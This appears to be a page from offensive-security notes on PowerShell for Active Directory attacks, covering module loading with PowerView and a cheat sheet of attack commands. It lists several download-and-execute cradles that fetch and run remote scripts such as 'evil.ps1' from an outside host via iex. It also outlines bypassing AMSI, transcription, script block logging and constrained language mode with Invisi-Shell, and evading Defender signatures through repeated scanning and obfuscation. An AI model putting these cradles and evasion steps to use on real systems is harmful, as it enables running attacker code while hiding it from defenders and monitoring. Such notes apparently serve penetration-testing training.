search

PowerShell

hashtag
Loading a Module

• Load a PowerShell script using dot sourcing
. C:\AD\Tools\PowerView.ps1

• A module (or a script) can be imported with:
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1

• All the commands in a module can be listed with:
Get-Command -Module <modulename>

hashtag
Script Execution

• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

hashtag
Invisi-Shell

To bypass:

  • System-wide transcription

  • AMSI

  • System Block Logging

  • CLM

hashtag
Bypassing AV Signatures for Powershell

Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection.

To obfuscate entire script, use Invoke-Obfuscation.

hashtag
AMSI Trigger

Steps to avoid signature based detection are pretty simple:

  1. Scan using AMSITrigger

  2. Modify the detected code snippet

  3. Rescan using AMSITrigger

  4. Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”

PreviousToolsNextAI Security

Last updated